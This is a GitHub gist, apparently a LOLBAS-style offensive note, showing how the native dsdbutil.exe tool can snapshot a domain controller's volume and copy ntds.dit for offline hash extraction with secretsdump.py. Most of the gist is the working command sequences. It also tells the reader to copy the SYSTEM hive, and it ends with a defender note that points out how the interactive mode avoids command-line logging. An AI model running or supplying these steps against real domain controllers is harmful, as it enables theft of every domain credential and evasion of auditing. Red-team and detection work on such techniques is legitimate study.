@filipesam
Forked from bohops/dsdbutil.exe
Created June 24, 2019 06:49
yet another native AD database extraction utility
DSDButil
========
- dsdbutil (dsdbutil.exe) is a command-line utility for maintaining AD LDS (Active Directory Lightweight Directory Services) databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]. It exposes the same menu structure as ntdsutil (activate instance, snapshot, quit), which is why the commands below can target the ntds instance on a domain controller
- dsdbutil's snapshot menu creates, lists, mounts, unmounts and deletes Volume Shadow Copy (VSS) snapshots of the volume holding the database
- because the copy is taken from a snapshot rather than the live, locked file, dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis, e.g. with Impacket's secretsdump.py. secretsdump.py also needs the SYSTEM registry hive (its -system option) to derive the boot key, so copy windows\system32\config\SYSTEM from the same snapshot as well
- Example #1: Using the snapshot GUID printed by the create command. The mount command prints the mount point, which has the form c:\$SNAP_<timestamp>_VOLUMEC$\; unmount before deleting so the mount point is removed cleanly
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "unmount {GUID}" "delete {GUID}" "quit" "quit"
- Example #2: Living dangerously with an assumed snapshot index. The index comes from the preceding "list all" and refers to whichever snapshot is listed first, which is only the one just created if no other snapshots exist on the host
dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "unmount 1" "delete 1" "quit" "quit"
*dsdbutil also supports an interactive mode (run dsdbutil.exe with no arguments and type the menu commands at its prompt), which is likely more stable than the one-shot examples above. Note for defenders: the one-liners put the whole command sequence, including "snapshot" and "mount", on the process command line, where command-line auditing (Security event 4688) or Sysmon event 1 records it; the interactive form only exposes the dsdbutil.exe launch itself.